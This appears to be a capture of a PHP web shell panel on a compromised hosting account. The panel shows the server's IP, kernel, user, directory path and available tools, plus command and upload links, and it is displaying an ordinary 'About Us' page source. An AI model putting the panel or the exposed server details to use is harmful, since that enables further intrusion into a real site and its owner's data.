Server IP : 103.53.40.154 / Your IP : 3.129.69.134 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/bsaec.in/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php include ('admin/config.php'); $sql2 = "SELECT * FROM `tb2_about`"; $run2 = mysqli_query($db,$sql2) or die("Query Not run"); $data2 = mysqli_fetch_assoc($run2); ?> <!DOCTYPE html> <html lang="en"> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <head> <meta charset="utf-8"> <title><?php echo $data2['meta_title']?></title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> <?php include 'top-link.php';?> </head> <body> <?php include 'header.php';?> <!-- Page Header Start --> <div class="container-fluid page-header py-6 my-6 mt-0 wow fadeIn" data-wow-delay="0.1s"> <div class="container text-center"> <h1 class="display-4 text-white animated slideInDown mb-4">About Us</h1> <nav aria-label="breadcrumb animated slideInDown"> <ol class="breadcrumb justify-content-center mb-0"> <li class=""><a class="text-white" href="index.php">Home </a></li> <span class="mx-3"> |</span> <li class=" text-primary active" aria-current="page"> About</li> </ol> </nav> </div> </div> <!-- Page Header End --> <!-- About Start --> <div class="container-xxl py-6"> <div class="container"> <div class="row g-5"> <div class="col-lg-6 wow fadeInUp" data-wow-delay="0.1s"> <div class="position-relative overflow-hidden ps-5 pt-5 h-100" style="min-height: 400px;"> <img class="position-absolute w-100 h-100" src="img/<?php echo $data2['image']?>" alt="<?php echo $data2['image']?>" style="object-fit: cover;"> <img class="position-absolute top-0 start-0 bg-white pe-3 pb-3" src="img/about-2.jpg" alt="" style="width: 200px; height: 200px;"> </div> </div> <div class="col-lg-6 wow fadeInUp" data-wow-delay="0.5s"> <div class="h-100"> <h6 class="text-primary text-uppercase mb-2">About Us</h6> <h1 class="display-6 mb-4"><?php echo $data2['about_title']?></h1> <p style="font-size: 13px;"><?php echo $data2['about_desc']?></p> <div class="row g-4"> <div class="col-sm-6"> <a class="btn btn-primary py-3 px-5" href="contact.php">Contact Us</a> </div> <div class="col-sm-6"> <a class="d-inline-flex align-items-center btn btn-outline-primary border-2 p-2" href="tel:<?php echo $data01['admin_phone']?>"> <span class="flex-shrink-0 btn-square bg-primary"> <i class="fa fa-phone-alt text-white"></i> </span> <span class="px-3"><?php echo $data01['admin_phone']?></span> </a> </div> </div> </div> </div> </div> </div> </div> <!-- About End --> <!-- Team Start --> <?php include 'team.php';?> <!-- Team End --> <?php include 'footer.php';?>